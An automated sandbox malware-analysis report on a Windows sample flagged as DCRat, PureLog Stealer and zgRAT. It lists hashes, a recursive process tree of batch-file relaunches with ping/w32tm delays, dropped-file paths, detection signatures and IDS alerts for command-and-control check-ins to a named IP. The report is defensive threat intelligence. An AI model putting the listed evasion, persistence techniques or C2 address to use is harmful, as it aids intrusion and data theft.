Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
teh76E2k50.exe

Overview

General Information

Sample name:teh76E2k50.exe
renamed because original name is a hash value
Original sample name:832D64C5F330BE9505301104FCFC574A.exe
Analysis ID:1547568
MD5:832d64c5f330be9505301104fcfc574a
SHA1:de70a17b5e6f2186bb611e9bfacdcfe6b4fd9ed2
SHA256:29472c5e2c502ed00e6e34e4c8ef71be0e94a0971f548df68689aaf23b8f1064
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • teh76E2k50.exe (PID: 5772 cmdline: "C:\Users\user\Desktop\teh76E2k50.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
    • cmd.exe (PID: 1568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5880 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 2436 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 4072 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
        • cmd.exe (PID: 5576 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 5632 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 2508 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 4616 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
            • cmd.exe (PID: 2000 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 1964 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 2968 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 4564 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                • cmd.exe (PID: 6276 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 5268 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 3160 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 6500 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                    • cmd.exe (PID: 2072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • chcp.com (PID: 5800 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                      • w32tm.exe (PID: 6980 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                      • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 1672 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                        • cmd.exe (PID: 5028 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • chcp.com (PID: 5416 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                          • PING.EXE (PID: 5512 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                          • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 7084 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                            • cmd.exe (PID: 5760 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                              • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                              • chcp.com (PID: 3692 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                              • w32tm.exe (PID: 5812 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                              • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 6088 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                                • cmd.exe (PID: 4140 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                  • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                  • chcp.com (PID: 6044 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                  • w32tm.exe (PID: 2636 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                  • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 5528 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                                    • cmd.exe (PID: 4952 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                      • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                      • chcp.com (PID: 2296 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                      • w32tm.exe (PID: 2612 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                      • wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe (PID: 1852 cmdline: "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" MD5: 832D64C5F330BE9505301104FCFC574A)
                                        • cmd.exe (PID: 1164 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                          • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
teh76E2k50.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    teh76E2k50.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.2197360091.00000000008F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.2310983468.00000000133EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: teh76E2k50.exe PID: 5772JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe PID: 4072JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.teh76E2k50.exe.8f0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.teh76E2k50.exe.8f0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\teh76E2k50.exe, ProcessId: 5772, TargetFilename: C:\Windows\SchCache\sihost.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-02T17:47:40.982112+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549782TCP
                            2024-11-02T17:48:18.795771+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549984TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-02T17:47:48.403181+010020480951A Network Trojan was detected192.168.2.549829194.135.20.480TCP
                            2024-11-02T17:48:03.731878+010020480951A Network Trojan was detected192.168.2.549909194.135.20.480TCP
                            2024-11-02T17:48:25.612187+010020480951A Network Trojan was detected192.168.2.549998194.135.20.480TCP
                            2024-11-02T17:48:35.409477+010020480951A Network Trojan was detected192.168.2.550000194.135.20.480TCP
                            2024-11-02T17:48:48.746972+010020480951A Network Trojan was detected192.168.2.550002194.135.20.480TCP
                            2024-11-02T17:48:58.684477+010020480951A Network Trojan was detected192.168.2.550004194.135.20.480TCP
                            2024-11-02T17:49:10.569070+010020480951A Network Trojan was detected192.168.2.550005194.135.20.480TCP
                            2024-11-02T17:49:23.997157+010020480951A Network Trojan was detected192.168.2.550008194.135.20.480TCP
                            2024-11-02T17:49:32.751139+010020480951A Network Trojan was detected192.168.2.550009194.135.20.480TCP
                            2024-11-02T17:49:45.710601+010020480951A Network Trojan was detected192.168.2.550011194.135.20.480TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: teh76E2k50.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\znx0BCuWHE.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\tOMWzubzd4.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\uHdcbfRrII.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\TCMSovEgtl.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\HL35FbYWw1.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\Desktop\BVbCJhtL.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\8JExSyzmRo.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.batAvira: detection malicious, Label: BAT/Delbat.C
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeReversingLabs: Detection: 71%
                            Source: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeReversingLabs: Detection: 71%
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\Desktop\AQotzTRR.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\ASPeVAWX.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\AVHMeQAt.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\AefMODTq.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\BGEGNIeN.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\BQYWEsJr.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\BmiVXCnN.logReversingLabs: Detection: 33%
                            Source: C:\Users\user\Desktop\CJDckQCP.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\CUHLiuul.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\DUVDVzTj.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\DVEbprGR.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\DswJWuJN.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\FFnbpIFd.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\FIZLHNPh.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\GGiDqFDB.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\GrWSIakL.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\HJAvhXOf.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\HPmLzFXY.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\HhaNcSpz.logReversingLabs: Detection: 33%
                            Source: C:\Users\user\Desktop\IQXUcfJd.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\ITPCmwoz.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\IzyaiCCJ.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\JapvNPbx.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\JvdSwEFX.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\KFIMcleA.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\KszcatAz.logReversingLabs: Detection: 33%
                            Source: C:\Users\user\Desktop\LBCkjtUW.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\LESjjfMz.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\LGJlUtwq.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\MwSuJUdT.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\NAwlwLuv.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\NGhBOsDn.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\NQgmULbr.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\NhIjUycT.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\OOHuqLql.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\OnPkEyEo.logReversingLabs: Detection: 25%
                            Multi AV Scanner detection for submitted file
                            Source: teh76E2k50.exeReversingLabs: Detection: 71%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\BSjUAQPo.logJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\ASPeVAWX.logJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\BMbUPQnU.logJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: teh76E2k50.exeJoe Sandbox ML: detected
                            Source: teh76E2k50.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDirectory created: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDirectory created: C:\Program Files\Windows Mail\81acb8af1bb493Jump to behavior
                            Source: teh76E2k50.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2976138886.000000001B540000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3585076992.000000001B3B6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: KZll\System.pdbYA source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3345697219.000000001C023000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3058692219.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2976138886.000000001B540000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3585076992.000000001B3B6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdbpdbtem.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3503891840.000000001C100000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FF848BFB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 4x nop then jmp 00007FF848A622F6h7_2_00007FF848A620EE
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh7_2_00007FF848BFB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh14_2_00007FF848BBB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh20_2_00007FF848BDB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh26_2_00007FF848BCB94D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 4x nop then jmp 00007FF848A322F6h32_2_00007FF848A320EE
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh32_2_00007FF848BCB94D

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49909 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49998 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50000 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50002 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50011 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50009 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50008 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50004 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49829 -> 194.135.20.4:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:50005 -> 194.135.20.4:80
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
                            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49782
                            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49984
